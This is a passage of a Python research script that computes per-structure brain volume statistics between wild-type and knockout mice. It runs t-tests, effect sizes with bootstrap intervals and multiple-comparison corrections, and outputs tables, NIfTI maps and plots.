'pername_2_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_3_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mi_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ce_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mice_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ceSN_sn_volumes_mouse_' + comb_str + '.csv')]\r\nfor iIncludeInTest in [0, 1, 2, 3, 4, 5, 6, 7]: # 4 5 6 add, ce-mid, ce and mid\r\n print(f'iIncludeInTest = {iIncludeInTest}')\r\n mouse_table_pername_list = list()\r\n mouse_table_all_nobackground = output_table_all.loc[np.logical_not(pd.isnull(output_table_all['name']))]\r\n if (iIncludeInTest == 1) | (iIncludeInTest == 2):\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[\r\n mouse_table_all_nobackground['include_in_test'] == iIncludeInTest]\r\n elif iIncludeInTest == 3:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_list)]\r\n elif iIncludeInTest == 4:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_mi_list)]\r\n elif iIncludeInTest == 5:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_ce_list)]\r\n elif iIncludeInTest == 6:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_mice_list)]\r\n elif iIncludeInTest == 7:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_ceSN_list)]\r\n # mouse_table_all.loc[pd.isnull(mouse_table_all['name']), 'name'] = 'background'\r\n name_uniq = np.unique(np.array(mouse_table_all_nobackground['name'].astype('category')))\r\n nName = len(name_uniq)\r\n for nameStruct in name_uniq:\r\n mouse_table_nameStruct = mouse_table_all_nobackground[mouse_table_all_nobackground['name'] == nameStruct]\r\n mouse_table_nameStruct_WT = mouse_table_nameStruct.loc[mouse_table_nameStruct['Genotype'] == 'WT']\r\n mouse_table_nameStruct_KO = mouse_table_nameStruct.loc[mouse_table_nameStruct['Genotype'] == 'KO']\r\n [t_stat, p_val] = ttest_ind(mouse_table_nameStruct_WT['Volume'],\r\n mouse_table_nameStruct_KO['Volume'],\r\n equal_var=False)\r\n [t_stat_RN, p_val_RN] = ttest_ind(mouse_table_nameStruct_WT['VolumeRootNormalized'],\r\n mouse_table_nameStruct_KO['VolumeRootNormalized'],\r\n equal_var=False)\r\n mean_WT = np.mean(mouse_table_nameStruct_WT['Volume'])\r\n mean_KO = np.mean(mouse_table_nameStruct_KO['Volume'])\r\n std_WT = np.std(mouse_table_nameStruct_WT['Volume'])\r\n std_KO = np.std(mouse_table_nameStruct_KO['Volume'])\r\n mean_WT_AN = np.mean(mouse_table_nameStruct_WT['VolumeNormalized'])\r\n mean_KO_AN = np.mean(mouse_table_nameStruct_KO['VolumeNormalized'])\r\n std_WT_AN = np.std(mouse_table_nameStruct_WT['VolumeNormalized'])\r\n std_KO_AN = np.std(mouse_table_nameStruct_KO['VolumeNormalized'])\r\n mean_WT_RN = np.mean(mouse_table_nameStruct_WT['VolumeRootNormalized'])\r\n mean_KO_RN = np.mean(mouse_table_nameStruct_KO['VolumeRootNormalized'])\r\n std_WT_RN = np.std(mouse_table_nameStruct_WT['VolumeRootNormalized'])\r\n std_KO_RN = np.std(mouse_table_nameStruct_KO['VolumeRootNormalized'])\r\n\r\n\r\n\r\n nWT = len(mouse_table_nameStruct_WT['Volume'])\r\n nKO = len(mouse_table_nameStruct_KO['Volume'])\r\n N = nWT + nKO\r\n # print(f'nWT{nWT}, nKO={nKO}, N={N}')\r\n S_p = np.sqrt(((nWT - 1) * np.power(std_WT, 2) + (nKO - 1) * np.power(std_KO, 2)) / (N - 2))\r\n S_p_AN = np.sqrt(((nWT - 1) * np.power(std_WT_AN, 2) + (nKO - 1) * np.power(std_KO_AN, 2)) / (N - 2))\r\n S_p_RN = np.sqrt(((nWT - 1) * np.power(std_WT_RN, 2) + (nKO - 1) * np.power(std_KO_RN, 2)) / (N - 2))\r\n cohenD = (mean_WT - mean_KO) / S_p\r\n cohenD_AN = (mean_WT_AN - mean_KO_AN) / S_p_AN\r\n cohenD_RN = (mean_WT_RN - mean_KO_RN) / S_p_RN\r\n\r\n S_a = np.sqrt((np.power(std_WT, 2) + np.power(std_KO, 2)) / 2)\r\n S_a_RN = np.sqrt((np.power(std_WT_RN, 2) + np.power(std_KO_RN, 2)) / 2)\r\n cohenD_RN_a = (mean_WT_RN - mean_KO_RN) / S_a_RN\r\n hedge_correction = (N - 3) / (N - 2.25)\r\n cohenD_ac = ((mean_WT - mean_KO) / S_a) * hedge_correction\r\n cohenD_RN_ac = ((mean_WT_RN - mean_KO_RN) / S_a_RN) * hedge_correction\r\n # print(f'cohenD_RN = {cohenD_RN}, cohenD_RN_a = {cohenD_RN_a}, '\r\n # f'cohenD_RN_ac = {cohenD_RN_ac}, cohenD_ac = {cohenD_ac}')\r\n\r\n cohenD_BS = np.empty(nIterBootstrap)\r\n cohenD_RN_BS = np.empty(nIterBootstrap)\r\n for iBS in range(nIterBootstrap):\r\n WT_BS = np.random.normal(mean_WT, std_WT, nWT)\r\n KO_BS = np.random.normal(mean_KO, std_KO, nKO)\r\n mean_WT_BS = np.mean(WT_BS)\r\n mean_KO_BS = np.mean(KO_BS)\r\n std_WT_BS = np.std(WT_BS)\r\n std_KO_BS = np.std(KO_BS)\r\n S_p = np.sqrt(((nWT - 1) * np.power(std_WT_BS, 2) + (nKO - 1) * np.power(std_KO_BS, 2)) / (nKO + nWT - 2))\r\n S_a = np.sqrt((np.power(std_WT, 2) + np.power(std_KO, 2)) / 2)\r\n cohenD_BS[iBS] = ((mean_WT_BS - mean_KO_BS) / S_a) * hedge_correction\r\n\r\n WT_RN_BS = np.random.normal(mean_WT_RN, std_WT_RN, nWT)\r\n KO_RN_BS = np.random.normal(mean_KO_RN, std_KO_RN, nKO)\r\n mean_WT_RN_BS = np.mean(WT_RN_BS)\r\n mean_KO_RN_BS = np.mean(KO_RN_BS)\r\n std_WT_RN_BS = np.std(WT_RN_BS)\r\n std_KO_RN_BS = np.std(KO_RN_BS)\r\n S_p_RN = np.sqrt(\r\n ((nWT - 1) * np.power(std_WT_RN_BS, 2) + (nKO - 1) * np.power(std_KO_RN_BS, 2)) / (nKO + nWT - 2))\r\n S_a_RN = np.sqrt((np.power(std_WT_RN, 2) + np.power(std_KO_RN, 2)) / 2)\r\n cohenD_RN_BS[iBS] = ((mean_WT_RN_BS - mean_KO_RN_BS) / S_a_RN) * hedge_correction\r\n cohenD_ac_CI = [np.quantile(cohenD_BS, .025), np.quantile(cohenD_BS, .975)]\r\n cohenD_RN_ac_CI = [np.quantile(cohenD_RN_BS, .025), np.quantile(cohenD_RN_BS, .975)]\r\n # cohenD_check = [np.quantile(cohenD_BS, .5), np.median(cohenD_BS)]\r\n # print(cohenD_check)\r\n\r\n\r\n\r\n mouse_table_pername_list.append(pd.DataFrame({'name': [nameStruct],\r\n 'cohenD': [cohenD_ac],\r\n 'cohenD_CI': [cohenD_ac_CI],\r\n 'cohenD_BrainNormalized': [cohenD_RN_ac],\r\n 'cohenD_BrainNormalized_CI': [cohenD_RN_ac_CI],\r\n 't_stat': [t_stat],\r\n 'pVal': [p_val],\r\n 'pVal_BrainNormalized': [p_val_RN],\r\n 'WT_mean': [mean_WT],\r\n 'WT_std': [std_WT],\r\n 'KO_mean': [mean_KO],\r\n 'KO_std': [std_KO],\r\n 'WT_mean_AllenNormalized': [mean_WT_AN],\r\n 'WT_std_AllenNormalized': [std_WT_AN],\r\n 'KO_mean_AllenNormalized': [mean_KO_AN],\r\n 'KO_std_AllenNormalized': [std_KO_AN],\r\n 'WT_mean_BrainNormalized': [mean_WT_RN],\r\n 'WT_std_BrainNormalized': [std_WT_RN],\r\n 'KO_mean_BrainNormalized': [mean_KO_RN],\r\n 'KO_std_BrainNormalized': [std_KO_RN]}))\r\n\r\n # nameStruct_filename = \"\".join([c for c in nameStruct if c.isalpha() or c.isdigit() or c == ' ']).rstrip()\r\n # mouse_table_nameStruct.to_csv(os.path.join(analysis_path, 'perstructure', nameStruct_filename+'_volumes_mouse.csv'))\r\n\r\n mouse_table_pername = pd.concat(mouse_table_pername_list, ignore_index=True)\r\n pVal_isnan = np.logical_not(np.isnan(mouse_table_pername['pVal']))\r\n mouse_table_pername.loc[pVal_isnan, 'pValBon'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal'], method='bonferroni')[1]\r\n mouse_table_pername.loc[pVal_isnan, 'pValFDR'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal'], method='fdr_bh')[1]\r\n pVal_isnan = np.logical_and(np.logical_not(np.isnan(mouse_table_pername['pVal_BrainNormalized'])),\r\n mouse_table_pername['name'] != 'root')\r\n mouse_table_pername.loc[pVal_isnan, 'pValBon_BrainNormalized'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal_BrainNormalized'], method='bonferroni')[1]\r\n mouse_table_pername.loc[pVal_isnan, 'pValFDR_BrainNormalized'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal_BrainNormalized'], method='fdr_bh')[1]\r\n mouse_table_pername = mouse_table_pername.sort_values(by='pVal_BrainNormalized')\r\n mouse_table_pername = mouse_table_pername.reindex(columns=['name',\r\n 'cohenD', 'cohenD_BrainNormalized',\r\n 'cohenD_CI', 'cohenD_BrainNormalized_CI',\r\n 't_stat', 'pVal', 'pVal_BrainNormalized',\r\n 'pValBon', 'pValBon_BrainNormalized',\r\n 'pValFDR', 'pValFDR_BrainNormalized',\r\n 'WT_mean', 'WT_std',\r\n 'KO_mean', 'KO_std',\r\n 'WT_mean_AllenNormalized', 'WT_std_AllenNormalized',\r\n 'KO_mean_AllenNormalized', 'KO_std_AllenNormalized',\r\n 'WT_mean_BrainNormalized', 'WT_std_BrainNormalized',\r\n 'KO_mean_BrainNormalized', 'KO_std_BrainNormalized'])\r\n mouse_table_pername.to_csv(pername_table_path_list[iIncludeInTest])\r\n\r\n # Add id_custom column to pVal table\r\n mouse_table_pername = pd.merge(left=mouse_table_pername, right=structure.loc[:, ['name', 'id_custom']],\r\n left_on='name', right_on='name')\r\n mouse_table_pername['pVal_inv'] = np.abs(np.log10(mouse_table_pername['pVal']))\r\n\r\n # Save separate pval table with only cerebellum or only sn (lowLevel)\r\n # if iIncludeInTest == 0:\r\n if iIncludeInTest<4:\r\n pername_table_in = pd.merge(left=mouse_table_pername,\r\n right=reference_table[['id_custom', 'in_cerebellum', 'in_sn']],\r\n left_on='id_custom', right_on='id_custom')\r\n ce_logical = np.logical_and(np.logical_and(pername_table_in['in_cerebellum'],\r\n np.logical_not(np.isnan(pername_table_in['cohenD']))),\r\n np.isin(pername_table_in['id_custom'], annotation_lowLevel_list))\r\n pername_table_cerebellum = pername_table_in[ce_logical]\r\n pername_table_cerebellum = pername_table_cerebellum.drop('in_cerebellum', 1)\r\n pername_table_cerebellum['pValBon'] = multipletests(pername_table_cerebellum['pVal'], method='bonferroni')[1]\r\n pername_table_cerebellum['pValFDR'] = multipletests(pername_table_cerebellum['pVal'], method='fdr_bh')[1]\r\n pername_table_cerebellum['pValBon_BrainNormalized'] = multipletests(pername_table_cerebellum['pVal_BrainNormalized'], method='bonferroni')[1]\r\n pername_table_cerebellum['pValFDR_BrainNormalized'] = multipletests(pername_table_cerebellum['pVal_BrainNormalized'], method='fdr_bh')[1]\r\n pername_table_cerebellum.to_csv(pername_cerebellum_table_path_list[iIncludeInTest])\r\n\r\n sn_logical = np.logical_and(np.logical_and(np.logical_not(pername_table_in['in_cerebellum']),\r\n np.logical_not(np.isnan(pername_table_in['cohenD']))),\r\n np.isin(pername_table_in['id_custom'], annotation_lowLevel_list))\r\n pername_table_sn = pername_table_in[sn_logical]\r\n pername_table_sn = pername_table_sn.drop('in_sn', 1)\r\n pername_table_sn['pValBon'] = multipletests(pername_table_sn['pVal'], method='bonferroni')[1]\r\n pername_table_sn['pValFDR'] = multipletests(pername_table_sn['pVal'], method='fdr_bh')[1]\r\n pername_table_sn['pValBon_BrainNormalized'] = multipletests(pername_table_sn['pVal_BrainNormalized'], method='bonferroni')[1]\r\n pername_table_sn['pValFDR_BrainNormalized'] = multipletests(pername_table_sn['pVal_BrainNormalized'], method='fdr_bh')[1]\r\n pername_table_sn.to_csv(pername_sn_table_path_list[iIncludeInTest])\r\n\r\n# Create reference images with p-values in the image instead of structure integers\r\nmean_diff = mouse_table_pername['KO_mean'] - mouse_table_pername['WT_mean']\r\nmap_from = np.array(mouse_table_pername['id_custom'])\r\nfor i in range(12):\r\n\r\n annotation_pVal_path = os.path.join(analysis_path, annotation_path.split(os.sep)[-1].split('.')[0])\r\n if i == 0:\r\n map_to = np.array(mouse_table_pername['pVal'])\r\n annotation_pVal_path = annotation_pVal_path + '_pVal' + '.nii.gz'\r\n elif i == 1:\r\n map_to = np.array(mouse_table_pername['pVal_inv'])\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv' + '.nii.gz'\r\n elif i == 2:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig' + '.nii.gz'\r\n elif i == 3:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig' + '.nii.gz'\r\n elif i == 4:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_volIncrease' + '.nii.gz'\r\n elif i == 5:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_volDecrease' + '.nii.gz'\r\n elif i == 6:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_volIncrease' + '.nii.gz'\r\n elif i == 7:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_volDecrease' + '.nii.gz'\r\n elif i == 8:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig_volIncrease' + '.nii.gz'\r\n elif i == 9:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig_volDecrease' + '.nii.gz'\r\n elif i == 10:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig_volIncrease' + '.nii.gz'\r\n elif i == 11:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig_volDecrease' + '.nii.gz'\r\n\r\n map_to_filt = np.logical_not(np.isnan(map_to))\r\n map_to_filtered = map_to[map_to_filt]\r\n map_from_filtered = map_from[map_to_filt]\r\n\r\n annotation_remapped = np.round(annotation) # always annotation so should never be non-integer\r\n # input = input.astype(int) # always annotation so should never be non-integer\r\n annotation_remapped_shape = annotation_remapped.shape\r\n annotation_remapped = annotation_remapped.reshape(-1)\r\n annotation_remapped = npi.remap(annotation_remapped, map_from_filtered, map_to_filtered)\r\n annotation_remapped = annotation_remapped.reshape(annotation_remapped_shape)\r\n # annotation_remapped = remap_3D(annotation, map_from_filtered.astype(int), map_to_filtered)\r\n\r\n output_image = nib.Nifti1Image(annotation_remapped,\r\n annotation_image.affine)\r\n nib.save(output_image, annotation_pVal_path)\r\n\r\n\r\n\r\n########################################################################################################################\r\n# Create reference images with expression in the image instead of structure integers\r\npername_merged_table['pVal_inv_histo'] = np.abs(np.log10(pername_merged_table['pVal_histo']))\r\npername_merged_table = pd.merge(left=pername_merged_table,\r\n right=structure[['acronym', 'id_custom']],\r\n left_on='acronym',\r\n right_on='acronym')\r\nmap_from = pername_merged_table['id_custom']\r\nannotation_expIso = annotation * np.isin(annotation, map_from) # Everything not included in map_from should be 0 (no expression data for these structures)\r\nfor i in range(7):\r\n annotation_expression_path = os.path.join(analysis_path, annotation_path.split(os.sep)[-1].split('.')[0])\r\n if i == 0:\r\n map_to = np.ones(pername_merged_table.shape[0])\r\n annotation_expression_path = annotation_expression_path + '_expression_mask' + '.nii.gz'\r\n elif i == 1:\r\n map_to = np.array(pername_merged_table['cohenD_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_cohenD' + '.nii.gz'\r\n elif i == 2:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_pValAbsLog' + '.nii.gz'\r\n elif i == 3:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo']) * np.array(pername_merged_table['cohenD_histo'] > 0)\r\n annotation_expression_path = annotation_expression_path + '_expression_pValAbsLog_expDecrease' + '.nii.gz'\r\n elif i == 4:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo']) * np.array(pername_merged_table['cohenD_histo'] < 0)\r\n annotation_expression_path = annotation_expression_path + '_expression_pValAbsLog_expIncrease' + '.nii.gz'\r\n elif i == 5:\r\n map_to = np.array(pername_merged_table['WT_mean_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_WT_mean' + '.nii.gz'\r\n elif i == 6:\r\n map_to = np.array(pername_merged_table['KO_mean_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_KO_mean' + '.nii.gz'\r\n\r\n map_to_filt = np.logical_not(np.isnan(map_to))\r\n map_to_filtered = map_to[map_to_filt]\r\n map_from_filtered = map_from[map_to_filt]\r\n\r\n annotation_remapped = np.round(annotation_expIso) # always annotation so should never be non-integer\r\n # input = input.astype(int) # always annotation so should never be non-integer\r\n annotation_remapped_shape = annotation_remapped.shape\r\n annotation_remapped = annotation_remapped.reshape(-1)\r\n annotation_remapped = npi.remap(annotation_remapped, map_from_filtered, map_to_filtered)\r\n annotation_remapped = annotation_remapped.reshape(annotation_remapped_shape)\r\n # annotation_remapped = remap_3D(annotation, map_from_filtered.astype(int), map_to_filtered)\r\n\r\n output_image = nib.Nifti1Image(annotation_remapped,\r\n annotation_image.affine)\r\n nib.save(output_image, annotation_expression_path)\r\n########################################################################################################################\r\n\r\n\r\n\r\nVOIs = list(np.unique(output_table_all['name']))\r\nfigure_folder_path = os.path.join(analysis_path, 'Figures')\r\nif not os.path.exists(figure_folder_path):\r\n os.makedirs(figure_folder_path)\r\nfor iVOI in range(len(VOIs)):\r\n VOI_fileName = VOIs[iVOI].replace('/', '')\r\n output_table_all_VOI = output_table_all[output_table_all['name'] == VOIs[iVOI]]\r\n colorList = list()\r\n for iSub in range(output_table_all_VOI.shape[0]):\r\n if output_table_all_VOI['Genotype'].iloc[iSub] == 'WT':\r\n colorList.append((0.12156862745098039, 0.4666666666666667, 0.7058823529411765))\r\n else:\r\n colorList.append((1.0, 0.4980392156862745, 0.054901960784313725))\r\n\r\n # Figure 1: Boxplot volumes - absolute\r\n # fig1 = plt.figure()\r\n # ax = output_table_all_VOI[['VolumeNormalized', 'Genotype']].boxplot(\r\n # by=['Genotype'])\r\n #\r\n # plt.ylabel('Volume Normalized')\r\n # plt.xlabel('Genotype')\r\n # plt.title(VOIs[iVOI] + ' volumes')\r\n # plt.suptitle('') # that's what you're after\r\n # # ax.set_xticklabels(['WT', 'KO'])\r\n # # plt.show()\r\n # plt.savefig(os.path.join(figure_folder_path, 'Boxplot_' + VOI_fileName + '_ByGenotype'))\r\n\r\n # Figure 2: Boxplot volumes - root normalized\r\n fig2 = plt.figure()\r\n ax = output_table_all_VOI[['VolumeRootNormalized', 'Genotype']].boxplot(\r\n by=['Genotype'])\r\n\r\n plt.ylabel('Volume Percentage')\r\n plt.xlabel('Genotype')\r\n plt.title(VOIs[iVOI] + ' volumes')\r\n plt.suptitle('') # that's what you're after\r\n # ax.set_xticklabels(['WT', 'KO'])\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Boxplot_' + VOI_fileName + '_ByGenotype_rootNormalized'))\r\n\r\n # Figure 3: Barplot volumes - root normalized\r\n fig3 = plt.figure()\r\n ax = output_table_all_VOI.plot.bar(x='Mouse',\r\n y='VolumeRootNormalized',\r\n rot=60,\r\n color=colorList)\r\n plt.ylabel('Volume Normalized to Root')\r\n # plt.title(nameStruct + '_' + atlasStruct + ', CohenD = ' + format('%.2f'%cohenD_current))\r\n ax.get_legend().remove()\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Barplot_' + VOI_fileName + '_BySubject_rootNormalized'))\r\n plt.close('all')\r\n\r\n # Figure 4: Barplot volumes - absolute reference normalized\r\n fig4 = plt.figure()\r\n ax = output_table_all_VOI.plot.bar(x='Mouse',\r\n y='VolumeNormalized',\r\n rot=60,\r\n color=colorList)\r\n plt.ylabel('Volume Normalized to Reference')\r\n # plt.title(nameStruct + '_' + atlasStruct + ', CohenD = ' + format('%.2f'%cohenD_current))\r\n ax.get_legend().remove()\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Barplot_' + VOI_fileName + '_BySubject_referenceNormalized'))\r\n plt.close('all')\r\n#######################################################################################################################\r\n\r\n\r\n\r\n#\r\n#\r\n# volume_name = 'Lobule II'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# volume_name = 'Substantia nigra, compact part'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# volume_name = 'Substantia nigra, reticular part'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# # Plotting by genotype and sex\r\n# volume_name = 'Lobules IV-V'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype', 'Sex']].boxplot(by=['Genotype', 'Sex'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype and Sex')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotypeSex'))\r\n\r\n\r\n# Create volume tables per structure\r\n\r\n\r\n# # Load files\r\n# low_detail_cerebellum_image = nib.load(low_detail_cerebellum_path)\r\n# low_detail_cerebellum = low_detail_cerebellum_image.get_fdata()\r\n# high_detail_image = nib.load(high_detail_path)\r\n# high_detail = high_detail_image.get_fdata()\r\n# structure_graph = pd.read_csv(allen_structure_table_path_lowdetail)\r\n\r\n\r\n# Load remapped structuregraph\r\n\r\n# Loop through annotated images\r\n\r\n# Load image\r\n\r\n# Calculate highdetail volumes\r\n\r\n# Infer lowdetail volumes\r\n\r\n# Creat and save table for each mouse\r\n\r\n# Combine tables into one great table for all mice in analysis folder\r\n\r\n# Plot some boxplot plots\r\n\r\n\r\n#\r\n# ## Mask volume computation, separate from Allen and invwarped computations\r\n# mouse_voxel_number = mouse_list.copy()\r\n# mouse_mask_volume = mouse_list.copy()\r\n# for iMouse, Mouse in enumerate(mouse_list):\r\n# mouse_mask_image = nib.load(os.path.join(data_path, Mouse, (Mouse+'_mask_t=500_v=380_k=6.mask.nii.gz')))\r\n# mouse_mask_image_array = mouse_mask_image.get_fdata()\r\n#\r\n# mouse_voxel_number[iMouse] = np.sum(mouse_mask_image_array>0)\r\n# mouse_mask_volume[iMouse] = mouse_voxel_number[iMouse]*voxel_volume\r\n#\r\n# mouse_mask_table = pd.DataFrame({'Mouse': mouse_list, 'MaskVoxelNumber': mouse_voxel_number, 'MaskVolume': mouse_mask_volume})\r\n# mouse_mask_table['Genotype'] = mouse_mask_table['Mouse'].str.split(\"_\", n = 1, expand = True).iloc[:, 0]\r\n# mouse_mask_table['Sex'] = mouse_mask_table['Mouse'].str.split(\"_\", n = 3, expand = True).iloc[:, 2]\r\n# mouse_mask_table.loc[mouse_mask_table['Sex'] != 'female', 'Sex'] = 'male'\r\n#\r\n# # Plotting by genotype\r\n# gen_fig = plt.figure(1)\r\n# annotation_bin = nib.load(allen_image)\r\n# annotation_bin_array = annotation_bin.get_fdata()\r\n# allen_voxelnumber = np.sum(annotation_bin_array>.1)\r\n# allen_volume = allen_voxelnumber * voxel_reference_volume\r\n# mouse_mask_table_plot = pd.concat([mouse_mask_table, pd.DataFrame({'Mouse': ['Allen'], 'MaskVoxelNumber': [allen_voxelnumber], 'MaskVolume': [allen_volume], 'Genotype': ['Allen']})], sort=True)\r\n# # plt.suptitle('figure title')\r\n# # mouse_mask_table_plot=mouse_mask_table\r\n# ax = mouse_mask_table_plot[['MaskVolume', 'Genotype']].boxplot(by=['Genotype'])\r\n# # mouse_mask_table_plot.loc[mouse_mask_table_plot['Genotype'] == 'WT', 'Genotype'] = 1\r\n# # mouse_mask_table_plot.loc[mouse_mask_table_plot['Genotype'] == 'KO', 'Genotype'] = 2\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title('Brain mask volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_MaskVolumes_ByGenotype_Allen'))\r\n#\r\n# # Plotting by genotype and sex\r\n# gensex_fig = plt.figure(2)\r\n# mouse_mask_table[['MaskVolume', 'Genotype', 'Sex']].boxplot(by=['Genotype', 'Sex'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.ylabel('')\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_MaskVolumes_ByGenotypeSex'))\r\n# # plt.show()\r\n#\r\n# # pval calculation, equal_var for now ;)\r\n# mouse_mask_table[mouse_mask_table['Genotype'] == 'WT']['MaskVolume']\r\n# cat2 = mouse_mask_table[mouse_mask_table['Genotype'] == 'KO']\r\n#\r\n# print(ttest_ind(mouse_mask_table[mouse_mask_table['Genotype'] == 'WT']['MaskVolume'],\r\n# mouse_mask_table[mouse_mask_table['Genotype'] == 'KO']['MaskVolume'],\r\n# equal_var=True))\r\n#\r\n# mouse_mask_table.to_csv(os.path.join(analysis_path, 'Mouse_maskvolume_table.csv'))\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# # Define structure graph\r\n# structure_graph = pd.read_csv(os.path.join(allen_path, 'structure_graph_remapped.csv'))\r\n#\r\n#\r\n#\r\n# ## Get list of invwarped annotation files and compute volumes for them, compiling eventually into single table\r\n# mouse_invwarped_list = glob.glob(data_path+'/*/*/*invwarped*')\r\n# mouse_table_invwarped_list = mouse_invwarped_list.copy()\r\n# for iMouse, Mouse in enumerate(mouse_invwarped_list):\r\n# Mouse_name = Mouse.split('/')[7]\r\n# FNIRT_run = Mouse.split('/')[-2]\r\n#\r\n# mouse_table_invwarped_list[iMouse] = image2volumetable(Mouse)\r\n# mouse_table_invwarped_list[iMouse]['Mouse'] = Mouse_name\r\n# mouse_table_invwarped_list[iMouse]['FNIRT_run'] = FNIRT_run\r\n#\r\n# mouse_table_invwarped = pd.concat(mouse_table_invwarped_list)\r\n#\r\n# mouse_mask_table.to_csv(os.path.join(analysis_path, 'Mouse_invwarped_table.csv'))\r\n#\r\n#\r\n#\r\n# ## Compute volumes for allen reference\r\n# allen_table = image2volumetable(allen_image)\r\n# allen_table['Mouse'] = 'allen'\r\n# allen_table.to_csv(os.path.join(analysis_path, 'allen_table.csv'))\r\n\r\n\r\n# ## Compute volumes for flirted allen reference\r\n# allen_flirted_table = image2volumetable(allen_image_flirted)\r\n# allen_flirted_table['Mouse'] = 'allen_flirted'\r\n# allen_flirted_table.to_csv(os.path.join(analysis_path, 'allen_flirted_table.csv'))\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# # for i in range(100):\r\n# # 